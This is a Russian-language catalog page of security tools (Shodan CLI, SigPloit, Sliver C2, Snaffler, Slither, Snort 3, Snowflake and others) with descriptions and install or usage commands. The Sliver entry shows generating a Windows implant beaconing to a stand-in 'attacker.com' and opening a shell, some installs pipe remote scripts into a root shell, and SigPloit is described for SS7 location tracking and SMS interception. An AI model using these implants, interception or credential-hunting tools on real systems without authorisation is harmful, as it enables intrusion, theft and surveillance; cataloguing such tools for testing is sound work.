Каталог инструментов

473 инструментов

ShieldGrid

vlatest
Exploitation

Фреймворк для симуляции сетевого сканирования, lateral movement и злоупотребления протоколами в среде тестирования безопасности.

—

Shodan CLI

v1.28.0
Reconnaissance

Официальный Python CLI для Shodan — поискового движка устройств в интернете. Поиск по баннерам/сервисам, информация об IP, мониторинг изменений, alert-уведомления. Незаменим для разведки attack surface организации: открытые порты, …

pip install shodan shodan init YOUR_API_KEY shodan search "product:nginx country:RU" shodan host 8.8.8.8

SigPloit

v1.0
Wireless & RF ★ featured

Фреймворк для тестирования сигнальных протоколов телекоммуникационных сетей: SS7, Diameter, GTP, SIP. Позволяет проводить атаки на отслеживание местоположения, перехват SMS/звонков, DoS на HLR/VLR. Проверяет защищённость операторских сетей.

git clone https://github.com/SigPloiter/SigPloit cd SigPloit && pip install -r requirements.txt # Запуск: python sigploit.py

Sing-box

v1.13.14
Anonymizers ★ featured

Универсальная платформа для построения прокси-туннелей следующего поколения. Поддерживает десятки протоколов в одном бинарнике: VLESS+Reality, VMess, Trojan, Shadowsocks, Hysteria2, TUIC, NaiveProxy, Tor, WireGuard. Единый JSON-конфиг с правилами маршрутизации, DNS, …

# Установка bash <(curl -fsSL https://sing-box.app/deb-install.sh) # или: go install github.com/sagernet/sing-box/cmd/sing-box@latest # Запуск sing-box run -c config.json # Пример — клиент с VLESS+Reality: # {"outbounds":[{"type":"vless","server":"...","tls":{"reality":{"enabled":true}}}]}

Slither

v0.11.5
Blockchain / Web3

Статический анализатор смарт-контрактов Solidity от Trail of Bits. 80+ детекторов: reentrancy, integer overflow, tx.origin authentication, unprotected SELFDESTRUCT, shadowing переменных. Строит граф вызовов, inheritance, выполняет taint-анализ. Интегрируется в CI/CD …

pip install slither-analyzer # Анализ проекта Hardhat/Foundry slither . # Конкретный контракт slither contract.sol # JSON-вывод для CI slither . --json results.json

Sliver

v1.7.3
Exploitation

Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, …

# Скачать бинарь сервера: # https://github.com/BishopFox/sliver/releases # Linux (быстрый старт): curl https://sliver.sh/install | sudo bash # Запустить сервер: sudo sliver-server # В консоли Sliver: # Создать имплант (beacon): generate beacon --mtls attacker.com --os windows --arch amd64 # Запустить listener: mtls # Ждать подключения: beacons use <beacon-id> ls / whoami / shell

SmartBugs

v2.1.1
Blockchain / Web3

Фреймворк для запуска нескольких инструментов анализа смарт-контрактов (Mythril, Slither, Oyente, Manticore и др.) параллельно и сравнения их результатов. Автоматизирует аудит по нескольким движкам с единым отчётом.

git clone https://github.com/smartbugs/smartbugs cd smartbugs install/setup-venv.sh # Анализ контракта всеми инструментами ./smartbugs -t all -f contracts/MyContract.sol # Только Mythril + Slither ./smartbugs -t mythril slither -f MyContract.sol # JSON-вывод результатов ./smartbugs -t slither -f MyContract.sol ./reparse results ./results2csv -p results > results.csv

Snaffler

v1.0.244
Post-Exploitation

Инструмент для обнаружения файловых ресурсов в сети Windows — помогает находить потенциально открытые файлы и учётные данные.

git clone https://github.com/SnaffCon/Snaffler.git cd Snaffler dotnet build -c Release

SniffNet

v1.5.0
Network Analysis

Кросс-платформенный монитор сетевого трафика с графическим интерфейсом на Rust. Отображает соединения в реальном времени, определяет геолокацию IP, классифицирует протоколы (HTTP, DNS, TLS и др.), строит диаграммы и графики …

# Скачать бинарник из релизов (Linux / macOS / Windows) # https://github.com/GyulyVGC/sniffnet/releases # Через cargo cargo install sniffnet # Через Homebrew (macOS) brew install sniffnet # Arch Linux (AUR) yay -S sniffnet # После установки — запуск GUI sniffnet

Sniffglue

v0.16.2
Network Analysis

Sniffglue — это безопасный сниффер, написанный на Rust. Он создан с упором на безопасность и стабильность, использует привилегированные операции только в минимально необходимом объеме, что снижает риск в …

apt install sniffglue или sudo apt install libpcap-dev libseccomp-dev curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh source $HOME/.cargo/env cargo install sniffglue sniffglue --help

Snort 3

v3.12.2.0
Network Analysis

Следующее поколение Snort IDS/IPS на C++: модульная архитектура с плагинами, нативный IPv6, многопоточная обработка пакетов, унифицированный синтаксис правил и совместимость с миллионами существующих сигнатур.

# Debian / Ubuntu (сборка из исходников) sudo apt install build-essential libpcap-dev libpcre3-dev libdnet-dev zlib1g-dev liblzma-dev openssl libssl-dev libhwloc-dev cmake pkg-config # Зависимость libdaq git clone https://github.com/snort3/libdaq && cd libdaq ./configure && make && sudo make install && cd .. # Snort 3 git clone https://github.com/snort3/snort3 cd snort3 && ./configure_cmake.sh --prefix=/usr/local cd build && make -j$(nproc) && sudo make install # Проверка установки snort --version # Запуск с конфигом sudo snort -c /usr/local/etc/snort/snort.lua -i eth0

Snowflake

v2.10
Anonymizers

Pluggable transport для Tor, использующий WebRTC-соединения через добровольных proxy-операторов как "снежинки" (snowflakes). Обходит DPI и блокировки иначе, чем obfs4: трафик выглядит как легитимный WebRTC — тот же протокол …

# Установка клиента go install gitlab.torproject.org/tpo/anti-censorship/pluggable-transports/snowflake/v2/client@latest # Конфиг torrc для использования Snowflake # UseBridges 1 # Bridge snowflake 192.0.2.3:1 # ClientTransportPlugin snowflake exec ./snowflake-client # Или просто включить в Tor Browser: Connection → Use snowflake